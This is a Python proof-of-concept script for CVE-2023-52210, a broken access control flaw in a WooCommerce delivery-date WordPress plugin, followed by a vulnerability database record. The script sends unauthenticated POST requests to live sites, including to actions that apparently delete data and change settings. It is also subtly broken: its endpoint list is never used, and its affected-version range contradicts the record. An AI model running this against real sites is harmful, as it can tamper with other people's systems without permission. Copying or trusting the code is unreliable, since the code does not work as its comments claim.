CVE-2023-52210

import requests import sys # CVE-2023-52210 PoC - Broken Access Control in Product Delivery Date for WooCommerce Lite # Target: WordPress site with Product Delivery Date for WooCommerce Lite plugin < 2.7.0 def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2023-52210 This PoC attempts to access admin AJAX endpoints without authentication """ # Common AJAX endpoints for the plugin endpoints = [ '/wp-admin/admin-ajax.php', '/wp-admin/admin.php?page=pd_delivery_date', ] # Vulnerable actions that should require authentication vulnerable_actions = [ 'pd_update_delivery_date', 'pd_delete_delivery_date', 'pd_save_settings', 'pd_get_calendar_data', ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2023-52210 - Broken Access Control in Product Delivery Date for WooCommerce Lite\n") vulnerable = False for action in vulnerable_actions: data = { 'action': action, 'nonce': '', # No nonce required due to missing validation } try: response = requests.post(target_url, data=data, timeout=10) # Check if response indicates successful unauthorized access # Response codes: 200 without login requirement indicates vulnerability if response.status_code == 200: # Check response content for signs of successful exploitation if 'pd_delivery_date' in response.text or 'delivery_date' in response.text: print(f"[!] VULNERABLE: Action '{action}' accessible without authentication") print(f"[*] Response preview: {response.text[:200]}...") vulnerable = True else: print(f"[-] Action '{action}' returned 200 but no obvious data leak") else: print(f"[*] Action '{action}' returned status {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error testing action '{action}': {e}") if vulnerable: print("\n[+] Target is VULNERABLE to CVE-2023-52210") print("[+] Recommendation: Update Product Delivery Date for WooCommerce Lite to version 2.7.0 or later") return True else: print("\n[-] Target may not be vulnerable or plugin is not installed") return False if __name__ == '__main__': if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') check_vulnerability(target)

{"cve": {"id": "CVE-2023-52210", "sourceIdentifier": "[email protected]", "published": "2025-12-23T12:15:44.363", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in Tyche softwares Product Delivery Date for WooCommerce – Lite.This issue affects Product Delivery Date for WooCommerce – Lite: from n/a through 2.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://vdp.patchstack.com/database/wordpress/plugin/product-delivery-date-for-woocommerce-lite/vulnerability/wordpress-product-delivery-date-for-woocommerce-lite-plugin-2-7-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}